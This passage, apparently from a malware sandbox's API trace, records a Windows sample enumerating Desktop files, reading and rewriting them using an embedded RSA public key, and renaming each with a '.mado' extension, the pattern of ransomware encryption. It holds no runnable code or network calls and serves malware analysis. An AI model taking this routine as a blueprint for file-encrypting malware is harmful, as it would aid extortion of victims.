dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0203.740] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.740] GetLastError () returned 0x0 [0203.740] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.740] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0203.740] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.740] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.740] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.741] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3294350, Size=0x218) returned 0x33109f0 [0203.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b79390 [0203.741] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa820, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.741] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.741] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.741] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.741] CloseHandle (hObject=0x63c) returned 1 [0203.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2c88 [0203.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b6eb68 [0203.743] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2ejZWLY05H.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2ejzwly05h.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2ejZWLY05H.xls.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2ejzwly05h.xls.mado")) returned 1 [0203.744] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87149c30, ftCreationTime.dwHighDateTime=0x1d5da63, ftLastAccessTime.dwLowDateTime=0x692c8860, ftLastAccessTime.dwHighDateTime=0x1d5e4d9, ftLastWriteTime.dwLowDateTime=0x692c8860, ftLastWriteTime.dwHighDateTime=0x1d5e4d9, nFileSizeHigh=0x0, nFileSizeLow=0xc66b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4niurrjakXCa-R3TEdF0.mp4", cAlternateFileName="4NIURR~1.MP4")) returned 1 [0203.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0203.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0203.744] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4niurrjakXCa-R3TEdF0.mp4") returned=".mp4" [0203.744] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4niurrjakXCa-R3TEdF0.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4niurrjakxca-r3tedf0.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.744] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=50795) returned 1 [0203.744] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.747] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xc645, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.747] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.747] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xc66b, lpOverlapped=0x0) returned 1 [0203.748] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0203.748] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.748] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.748] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0203.749] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.749] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.749] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0203.749] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.749] GetLastError () returned 0x0 [0203.749] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.749] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0203.749] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.749] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.749] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.749] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3294350, Size=0x218) returned 0x33109f0 [0203.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b1e0 [0203.750] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xc66b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.750] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.750] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.750] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.750] CloseHandle (hObject=0x63c) returned 1 [0203.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0203.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b6eb68 [0203.751] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4niurrjakXCa-R3TEdF0.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4niurrjakxca-r3tedf0.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4niurrjakXCa-R3TEdF0.mp4.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4niurrjakxca-r3tedf0.mp4.mado")) returned 1 [0203.753] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8218b050, ftCreationTime.dwHighDateTime=0x1d5d85a, ftLastAccessTime.dwLowDateTime=0x6e0bcfb0, ftLastAccessTime.dwHighDateTime=0x1d5da59, ftLastWriteTime.dwLowDateTime=0x6e0bcfb0, ftLastWriteTime.dwHighDateTime=0x1d5da59, nFileSizeHigh=0x0, nFileSizeLow=0x7b32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="atrloJQ04x.mp3", cAlternateFileName="ATRLOJ~1.MP3")) returned 1 [0203.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0203.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0203.753] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\atrloJQ04x.mp3") returned=".mp3" [0203.753] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\atrloJQ04x.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\atrlojq04x.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.753] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=31538) returned 1 [0203.753] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.755] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x7b0c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.755] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.757] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.757] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x7b32, lpOverlapped=0x0) returned 1 [0203.758] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0203.758] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.758] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.758] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0203.759] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.759] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.759] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0203.759] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.759] GetLastError () returned 0x0 [0203.759] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.759] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0203.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.759] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.759] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.759] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7b30) returned 0x3b6eb68 [0203.759] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0203.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0203.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0203.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6dd78 [0203.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd58 [0203.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6ddc0 [0203.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd70 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdde8 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde30 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde00 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3294350 [0203.760] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3294350, Size=0x218) returned 0x33109f0 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b766a0 [0203.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdde8 | out: hHeap=0x2c0000) returned 1 [0203.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde00 | out: hHeap=0x2c0000) returned 1 [0203.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde30 | out: hHeap=0x2c0000) returned 1 [0203.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0203.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b766a0 | out: hHeap=0x2c0000) returned 1 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde30 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fde00 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fdde8 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b68190 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b682a8 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0203.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68190 | out: hHeap=0x2c0000) returned 1 [0203.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde00 | out: hHeap=0x2c0000) returned 1 [0203.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdde8 | out: hHeap=0x2c0000) returned 1 [0203.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0203.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde30 | out: hHeap=0x2c0000) returned 1 [0203.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0203.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33109f0 | out: hHeap=0x2c0000) returned 1 [0203.761] GetCurrentThreadId () returned 0x600 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bb80 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x323940 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6be98 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.761] GetCurrentThreadId () returned 0x600 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bc88 [0203.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bfa0 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde30 [0203.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0203.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0203.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0203.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0203.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0203.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0203.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdde8 [0203.762] HeapFree (in: 